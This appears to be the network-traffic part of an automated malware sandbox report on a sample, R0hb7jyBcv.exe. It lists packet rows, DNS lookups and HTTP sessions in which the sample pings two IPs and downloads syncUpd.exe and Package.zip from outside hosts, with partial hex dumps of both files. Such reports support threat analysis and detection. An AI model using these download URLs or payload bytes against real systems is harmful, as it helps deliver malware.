Apr 25, 2024 12:16:11.277359009 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.277432919 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.277439117 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.277476072 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.277523994 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.277523994 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.277524948 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.277539015 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.277551889 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.277605057 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.277610064 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.277610064 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.277687073 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.277692080 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.277720928 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.277745008 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.277762890 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.277791977 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.277842045 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.277843952 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.277868032 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.277900934 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.277918100 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.277955055 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.277961969 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.277986050 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.278012037 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.278012037 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.278033972 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.278042078 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.278069019 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.278116941 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.278116941 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.278136969 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.278160095 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.278192997 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.278208971 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.278249025 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.278307915 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.278326988 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.278379917 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.278393984 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.278407097 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.278413057 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.278455973 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.278465033 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.278465033 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.278507948 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.278518915 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.278541088 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.278554916 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.278584003 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.278584003 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.278606892 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.278618097 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.278661966 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.278687000 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.278691053 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.278709888 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.278732061 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.278745890 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.278774977 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.278791904 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.278805971 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.278840065 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.278840065 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.278863907 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.278877974 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.278918982 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.278939009 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.278956890 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.278996944 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.279004097 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.279004097 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.279062986 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.279103994 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.279103994 CEST	49733	80	192.168.2.4	176.97.76.106

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Apr 25, 2024 12:16:07.923835039 CEST	192.168.2.4	1.1.1.1	0xe981	Standard query (0)	note.padd.cn.com	A (IP address)	IN (0x0001)	false
Apr 25, 2024 12:16:18.568001032 CEST	192.168.2.4	1.1.1.1	0xf9d	Standard query (0)	svc.iolo.com	A (IP address)	IN (0x0001)	false
Apr 25, 2024 12:16:24.075093985 CEST	192.168.2.4	1.1.1.1	0x7d4a	Standard query (0)	download.iolo.net	A (IP address)	IN (0x0001)	false
Apr 25, 2024 12:16:53.030576944 CEST	192.168.2.4	1.1.1.1	0x3ebf	Standard query (0)	westus2-2.in.applicationinsights.azure.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Apr 25, 2024 12:16:08.854065895 CEST	1.1.1.1	192.168.2.4	0xe981	No error (0)	note.padd.cn.com		176.97.76.106	A (IP address)	IN (0x0001)	false
Apr 25, 2024 12:16:18.680826902 CEST	1.1.1.1	192.168.2.4	0xf9d	No error (0)	svc.iolo.com		20.157.87.45	A (IP address)	IN (0x0001)	false
Apr 25, 2024 12:16:19.811811924 CEST	1.1.1.1	192.168.2.4	0x4fd	No error (0)	bg.microsoft.map.fastly.net		199.232.210.172	A (IP address)	IN (0x0001)	false
Apr 25, 2024 12:16:19.811811924 CEST	1.1.1.1	192.168.2.4	0x4fd	No error (0)	bg.microsoft.map.fastly.net		199.232.214.172	A (IP address)	IN (0x0001)	false
Apr 25, 2024 12:16:20.807292938 CEST	1.1.1.1	192.168.2.4	0x18e8	No error (0)	fp2e7a.wpc.2be4.phicdn.net	fp2e7a.wpc.phicdn.net		CNAME (Canonical name)	IN (0x0001)	false
Apr 25, 2024 12:16:20.807292938 CEST	1.1.1.1	192.168.2.4	0x18e8	No error (0)	fp2e7a.wpc.phicdn.net		192.229.211.108	A (IP address)	IN (0x0001)	false
Apr 25, 2024 12:16:24.202198982 CEST	1.1.1.1	192.168.2.4	0x7d4a	No error (0)	download.iolo.net	iolo0.b-cdn.net		CNAME (Canonical name)	IN (0x0001)	false
Apr 25, 2024 12:16:24.202198982 CEST	1.1.1.1	192.168.2.4	0x7d4a	No error (0)	iolo0.b-cdn.net		169.150.236.98	A (IP address)	IN (0x0001)	false
Apr 25, 2024 12:16:53.252933025 CEST	1.1.1.1	192.168.2.4	0x3ebf	No error (0)	westus2-2.in.applicationinsights.azure.com	westus2-2.in.ai.monitor.azure.com		CNAME (Canonical name)	IN (0x0001)	false
Apr 25, 2024 12:16:53.252933025 CEST	1.1.1.1	192.168.2.4	0x3ebf	No error (0)	westus2-2.in.ai.monitor.azure.com	westus2-2.in.ai.privatelink.monitor.azure.com		CNAME (Canonical name)	IN (0x0001)	false
Apr 25, 2024 12:16:53.252933025 CEST	1.1.1.1	192.168.2.4	0x3ebf	No error (0)	westus2-2.in.ai.privatelink.monitor.azure.com	gig-ai-prod-westus2-0.trafficmanager.net		CNAME (Canonical name)	IN (0x0001)	false

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49730	185.172.128.90	80	7056	C:\Users\user\Desktop\R0hb7jyBcv.exe

Timestamp	Bytes transferred	Direction	Data
Apr 25, 2024 12:16:03.873013973 CEST	205	OUT	GET /cpa/ping.php?substr=five&s=ab&sub=0 HTTP/1.1 Host: 185.172.128.90 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.129 Safari/537.36
Apr 25, 2024 12:16:05.606241941 CEST	148	IN	HTTP/1.1 200 OK Date: Thu, 25 Apr 2024 10:16:03 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 1 Content-Type: text/html; charset=UTF-8 Data Raw: 30 Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49731	185.172.128.228	80	7056	C:\Users\user\Desktop\R0hb7jyBcv.exe

Timestamp	Bytes transferred	Direction	Data
Apr 25, 2024 12:16:05.830466986 CEST	191	OUT	GET /ping.php?substr=five HTTP/1.1 Host: 185.172.128.228 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.129 Safari/537.36
Apr 25, 2024 12:16:06.041737080 CEST	147	IN	HTTP/1.1 200 OK Date: Thu, 25 Apr 2024 10:16:05 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49732	185.172.128.59	80	7056	C:\Users\user\Desktop\R0hb7jyBcv.exe

Timestamp	Bytes transferred	Direction	Data
Apr 25, 2024 12:16:06.270526886 CEST	181	OUT	GET /syncUpd.exe HTTP/1.1 Host: 185.172.128.59 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.129 Safari/537.36
Apr 25, 2024 12:16:06.478562117 CEST	1289	IN	HTTP/1.1 200 OK Date: Thu, 25 Apr 2024 10:16:06 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Thu, 25 Apr 2024 10:15:01 GMT ETag: "45c00-616e90f67dd50" Accept-Ranges: bytes Content-Length: 285696 Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 23 2f 34 e6 67 4e 5a b5 67 4e 5a b5 67 4e 5a b5 79 1c cf b5 76 4e 5a b5 79 1c d9 b5 01 4e 5a b5 79 1c de b5 4b 4e 5a b5 40 88 21 b5 62 4e 5a b5 67 4e 5b b5 0b 4e 5a b5 79 1c d0 b5 66 4e 5a b5 79 1c ce b5 66 4e 5a b5 79 1c cb b5 66 4e 5a b5 52 69 63 68 67 4e 5a b5 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 43 d4 76 64 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 c4 00 00 00 14 82 02 00 00 00 00 70 17 00 00 00 10 00 00 00 e0 00 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 90 82 02 00 04 00 00 ca a9 04 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 ec 5e 03 00 3c 00 00 00 00 a0 81 02 60 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 80 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 63 c2 00 00 00 10 00 00 00 c4 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 a0 87 02 00 00 e0 00 00 00 88 02 00 00 c8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 bc 23 7e 02 00 70 03 00 00 2a 00 00 00 50 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 60 e0 00 00 00 a0 81 02 00 e2 00 00 00 7a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c7 01 cc e1 40 00 e9 dd 01 00 00 cc cc Data Ascii: MZ@!L!This program cannot be run in DOS mode.$#/4gNZgNZgNZyvNZyNZyKNZ@!bNZgN[NZyfNZyfNZyfNZRichgNZPELCvdp@^<`.textc `.rdata@@.data#~p*P@.rsrc`z@@@
Apr 25, 2024 12:16:06.478599072 CEST	1289	IN	Data Raw: cc cc cc 56 8b f1 c7 06 cc e1 40 00 e8 ca 01 00 00 f6 44 24 08 01 74 09 56 e8 c2 04 00 00 83 c4 04 8b c6 5e c2 04 00 cc cc cc cc cc cc cc cc cc cc cc cc 51 8b 46 0c 85 c0 74 1a 8b 0c 24 57 8b 7e 10 51 e8 7b 00 00 00 8b 56 0c 52 e8 8f 04 00 00 83 Data Ascii: V@D$tV^QFt$W~Q{VR_PFFFnQUYQEYD$VP@^V;t-~rFP3FFfN
Apr 25, 2024 12:16:06.478660107 CEST	1289	IN	Data Raw: 45 08 01 74 07 56 e8 cc ff ff ff 59 8b c6 5e 5d c2 04 00 8b ff 55 8b ec 8b 45 08 83 c1 09 51 83 c0 09 50 e8 c2 47 00 00 f7 d8 59 1b c0 59 40 5d c2 04 00 8b ff 56 6a 01 68 24 70 43 00 8b f1 e8 14 fc ff ff c7 06 cc e1 40 00 8b c6 5e c3 8b ff 55 8b Data Ascii: EtVY^]UEQPGYY@]Vjh$pC@^Uu1#Ytu8YtCCuChO@HYVMh^CEPCU=Cu"u hYY]jXh@YCf3uEP
Apr 25, 2024 12:16:06.478673935 CEST	1289	IN	Data Raw: 00 00 eb 09 8b 45 d8 64 a3 00 00 00 00 8b 45 c8 5b c9 c3 8b ff 55 8b ec 51 53 fc 8b 45 0c 8b 48 08 33 4d 0c e8 c4 f6 ff ff 8b 45 08 8b 40 04 83 e0 66 74 11 8b 45 0c c7 40 24 01 00 00 00 33 c0 40 eb 6c eb 6a 6a 01 8b 45 0c ff 70 18 8b 45 0c ff 70 Data Ascii: EdE[UQSEH3ME@ftE@$3@ljjEpEpEpjuEpu[_ Ex$uuujjjjjEPh#E]ck 3@[UQSVW}GwE-u$`MNkM9H};H~u
Apr 25, 2024 12:16:06.478687048 CEST	1289	IN	Data Raw: 8a 06 88 07 8a 46 01 88 47 01 8b 45 08 5e 5f c9 c3 8d 49 00 8a 06 88 07 8a 46 01 88 47 01 8a 46 02 88 47 02 8b 45 08 5e 5f c9 c3 90 8d 74 31 fc 8d 7c 39 fc f7 c7 03 00 00 00 75 24 c1 e9 02 83 e2 03 83 f9 08 72 0d fd f3 a5 fc ff 24 95 a0 20 40 00 Data Ascii: FGE^_IFGFGE^_t1\|9u$r$ @$P @Ir+$@$ @@@ @F#Gr$ @IF#GFGr$ @F#GFGFG
Apr 25, 2024 12:16:06.478759050 CEST	1289	IN	Data Raw: 3d 9c 83 c1 02 03 75 4b 83 c6 0f 83 e6 f0 89 75 0c 8b 45 08 3b 05 a8 83 c1 02 77 37 6a 04 e8 19 02 00 00 59 89 7d fc ff 75 08 e8 1f 0a 00 00 59 89 45 e4 c7 45 fc fe ff ff ff e8 5f 00 00 00 8b 5d e4 3b df 74 11 ff 75 08 57 53 e8 1f 34 00 00 83 c4 Data Ascii: =uKuE;w7jY}uYEE_];tuWS4;uaVj5\C@;uL9=Ct3VYrE;PE3ujY;uE;tVW3C<qCuqC8h0XYYt
Apr 25, 2024 12:16:06.478830099 CEST	1289	IN	Data Raw: b4 83 c1 02 83 a4 88 c4 00 00 00 00 a1 58 93 43 00 8b 40 10 fe 48 43 a1 58 93 43 00 8b 48 10 80 79 43 00 75 09 83 60 04 fe a1 58 93 43 00 83 78 08 ff 75 65 53 6a 00 ff 70 0c ff d6 a1 58 93 43 00 ff 70 10 6a 00 ff 35 5c 93 43 00 ff 15 ac e0 40 00 Data Ascii: XC@HCXCHyCu`XCxueSjpXCpj5\C@XCk+LQHQPE;XCvmEXC=[_^V5W3;u4kP5W5\C@;u3x5
Apr 25, 2024 12:16:06.478879929 CEST	1289	IN	Data Raw: eb 20 80 7d 0f 00 75 10 8d 4e e0 bf 00 00 00 80 d3 ef 8b 4d 08 09 79 04 8d 84 90 c4 00 00 00 8d 4e e0 ba 00 00 00 80 d3 ea 09 10 8b 45 10 89 03 89 44 18 fc 33 c0 40 5f 5e 5b c9 c3 8b ff 55 8b ec 83 ec 14 a1 a0 83 c1 02 8b 4d 08 6b c0 14 03 05 a4 Data Ascii: }uNMyNED3@_^[UMkMSI VW}M3US;#U#u];r;uS;#U#u];r;u[{u];r;u1{u
Apr 25, 2024 12:16:06.478893042 CEST	1289	IN	Data Raw: 8b ff 55 8b ec 33 c0 39 45 08 6a 00 0f 94 c0 68 00 10 00 00 50 ff 15 c8 e0 40 00 a3 5c 93 43 00 85 c0 75 02 5d c3 33 c0 40 a3 9c 83 c1 02 5d c3 8b ff 55 8b ec 57 bf e8 03 00 00 57 ff 15 cc e0 40 00 ff 75 08 ff 15 10 e0 40 00 81 c7 e8 03 00 00 81 Data Ascii: U39EjhP@\Cu]3@]UWW@u@`wt_]Uu5rC4h]Uh4@@th$@P<@tu]UuYu@jNYjkYUVt
Apr 25, 2024 12:16:06.478935957 CEST	1289	IN	Data Raw: 15 d4 e0 40 00 5f 5e 5b c9 c3 6a 03 e8 ba 4e 00 00 59 83 f8 01 74 15 6a 03 e8 ad 4e 00 00 59 85 c0 75 1f 83 3d 28 70 43 00 01 75 16 68 fc 00 00 00 e8 29 fe ff ff 68 ff 00 00 00 e8 1f fe ff ff 59 59 c3 8b ff 55 8b ec 8b 45 08 a3 ac 96 43 00 5d c3 Data Ascii: @_^[jNYtjNYu=(pCuh)hYYUEC]U5C/YtuYt3@]3]sCVj^u;}jPEYY`sujV5EYY`sujX^3sC`s vC\|j^3
Apr 25, 2024 12:16:06.686522961 CEST	1289	IN	Data Raw: c6 85 2f fe ff ff 00 89 b5 58 fe ff ff 89 b5 4c fe ff ff 89 b5 6c fe ff ff c6 85 61 fe ff ff 00 c6 85 60 fe ff ff 00 c6 85 6a fe ff ff 00 c6 85 53 fe ff ff 00 c6 85 62 fe ff ff 00 c6 85 73 fe ff ff 00 c6 85 6b fe ff ff 01 89 b5 28 fe ff ff 47 0f Data Ascii: /XLla`jSbsk(GP;VYtlLkDlN*tpFItLutkO6uG84u(48m3uG82u\dtWitR

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49733	176.97.76.106	80	7056	C:\Users\user\Desktop\R0hb7jyBcv.exe

Timestamp	Bytes transferred	Direction	Data
Apr 25, 2024 12:16:09.109280109 CEST	185	OUT	GET /1/Package.zip HTTP/1.1 Host: note.padd.cn.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.129 Safari/537.36
Apr 25, 2024 12:16:09.348268986 CEST	1289	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 25 Apr 2024 10:00:59 GMT Content-Type: application/zip Content-Length: 3884863 Last-Modified: Wed, 24 Apr 2024 05:45:46 GMT Connection: keep-alive ETag: "66289c8a-3b473f" Strict-Transport-Security: max-age=31536000 Accept-Ranges: bytes Data Raw: 50 4b 03 04 14 00 00 00 08 00 0b 3f 98 58 ef da 8c 80 dd c7 12 00 09 49 14 00 09 00 00 00 62 75 6e 63 68 2e 64 61 74 5c 5d 87 a2 aa 3a 16 cd af 89 8a 20 22 2a 16 10 05 54 ec 15 1b fa f7 b3 d6 4e 3c 77 66 bc ef 58 20 24 3b bb 65 b7 e4 29 a5 ac 9e af 7c 75 5d 2b bc a6 ca 55 2a 56 ea a9 7e af 81 db 9b bd d4 66 da 52 6a 65 f7 f5 b5 1d fe 1a b5 40 f5 66 f8 72 c0 df 56 0d 95 da 17 4a 2d f0 23 55 bd e7 b3 b7 bc 2a b5 de ab 3d ba 54 13 f5 45 13 35 cc 94 5a fa e3 83 aa 26 b5 9e 7a cf 95 fa f4 27 18 6b a2 8e 25 9e cb 4a 65 a9 cb 85 03 dc d4 5b 35 1e e8 cd c6 8f f7 50 c5 db 85 42 7f b5 19 40 05 ac f3 07 2e bf d4 e9 96 a8 47 eb fc 7a 5b 2a 8f 2d 42 31 e2 c3 ce d0 4a 7a 23 0c a9 ce d7 25 de bb 4a b1 fb a6 6a 06 0f d5 57 f5 a4 0e 18 af b5 00 1d 3e 36 32 eb 6a 4b 28 95 bc 0d d4 f1 a3 1a a1 9a c4 a5 02 84 45 b4 54 c9 51 7d d6 6a dd 5f 49 8b 8e 52 ee 54 45 6a a3 3e d2 f1 8b 4f c6 2a 99 3a 4a 25 6f a5 da aa 18 02 8b ec aa a6 b2 60 82 66 2b 4f a9 d6 1c 57 3e 15 87 c0 a3 dd 53 8e 49 4e 43 f5 6d ab 36 be a9 7c 77 51 bb 78 6b ba 4b fa eb fb e5 c8 6f bd 44 1d da 82 f4 13 3a ec 6e 34 01 be 0b f5 50 3e be 84 2a 4d 86 5f 7c 1b a9 8d 50 a7 52 40 9d 67 57 00 90 af 6b 98 90 58 dd c1 01 4d 62 4d d5 0b 9a 17 00 48 0d e6 07 f5 11 e0 eb 20 0c be a0 97 c5 23 6f 05 43 43 fb 21 da b5 c6 fd 31 21 52 f5 67 a2 f2 0a f8 51 63 20 22 50 0d 95 ab c2 51 87 33 a0 48 d0 42 f3 46 e7 7c 1d c6 aa 91 29 97 e0 bd ea cf c6 f8 a9 ae 13 dc f0 40 81 bf 57 f3 a8 36 9f a1 5a 03 15 37 90 39 e0 b5 ed a2 af b6 fc ea 91 64 27 60 5f bf 36 c0 7a 72 25 61 c7 c3 b6 85 1b 00 2a 1e 37 00 2c 2e 92 dd 6c 0c e4 a8 8e a3 2e 68 cb 76 9f f4 18 a0 8b e3 50 0d 4f 05 66 e1 8d 15 21 f4 fd 59 b7 f3 23 b3 b0 59 81 37 cd c2 67 d5 d8 b9 76 3d c4 f0 6b 7f a3 00 f0 4a d5 f9 d4 4e 23 5c a5 35 cc 93 d7 c1 d2 c2 a3 5d cc a7 ca f8 ad 1f b6 3c cf 56 47 55 00 7e 99 cb 9d a8 c7 2c bd d1 58 1e 6f 9b 6b 2e 80 23 8f ce 3f 76 a1 16 25 88 30 ac 2b f2 f9 8d 6d d8 28 6d c5 9e ea 61 68 be 4a 47 3e 16 00 83 fd d8 6d f7 d1 56 99 9a 0c dd f7 d3 6b 62 c0 f3 9a f3 42 ab 6a 58 a1 17 bc 56 24 70 92 a9 93 20 ce 95 c7 3f 9b 3c d8 aa f7 16 bd 5e cf 1d cc 25 4b 41 3d 30 5c be 28 ba c3 09 a6 f8 b8 51 ac 6c 3e 8c 3b 78 ad db 23 57 d5 96 40 40 1b 74 49 55 20 1d a6 f3 51 1b a0 8c 08 9a a5 16 97 14 c2 c0 d9 90 19 2f 65 c9 99 37 45 77 c4 95 f5 7d 68 dc e2 5e 4e e2 02 c5 20 89 9e 18 bb c2 8f 91 f9 de 2b 95 e6 fb 0e c8 b2 c7 0f 8d a9 62 52 7a ca ea f7 1a e3 8b 0a 81 9a 86 32 72 a5 66 1e de 84 75 27 6f bc f1 73 1c 7d 31 05 f4 b8 6a c5 7b 10 27 25 b5 c0 19 b5 85 1a b6 3f ce 81 8d 5a 03 fc 4d d5 00 d3 d4 ca ae 39 2e 7c 50 be dd 57 a3 6f a9 d6 f9 63 a0 92 d1 9b 33 c0 00 ed 15 48 5c 87 34 95 a2 42 8a c6 a3 c0 dc df df 3b 31 34 d1 a2 36 35 93 51 33 00 85 b9 f7 32 34 24 8b ec 84 e0 32 28 87 9a 39 6a c5 df 17 d5 9c fd f8 21 c1 24 f7 ea 96 9c 3c 3c 0f 86 c4 8d da 50 23 62 d7 15 4c 6a a1 44 97 76 47 c4 2b b4 7d af 54 82 03 36 74 52 d5 17 62 d9 22 e9 c4 9b 6f 84 66 a5 87 ef 68 3e cd 2a b9 86 e7 ac 89 1a fa c7 99 5a 0f 1d 35 99 28 dd d7 19 f0 5d a4 8f a2 90 d9 1c a7 e0 a5 Data Ascii: PK?XIbunch.dat\]: "TN<wfX $;e)\|u]+UV~fRje@frVJ-#U=TE5Z&z'k%Je[5PB@.Gz[-B1Jz#%JjW>62jK(ETQ}j_IRTEj>O:J%o`f+OW>SINCm6\|wQxkKoD:n4P>M_\|PR@gWkXMbMH #oCC!1!RgQc "PQ3HBF\|)@W6Z79d'`_6zr%a7,.l.hvPOf!Y#Y7gv=kJN#\5]<VGU~,Xok.#?v%0+m(mahJG>mVkbBjXV$p ?<^%KA=0\(Ql>;x#W@@tIU Q/e7Ew}h^N +bRz2rfu'os}1j{'%?ZM9.\|PWoc3H\4B;1465Q324$2(9j!$<<P#bLjDvG+}T6tRb"ofh>Z5(]
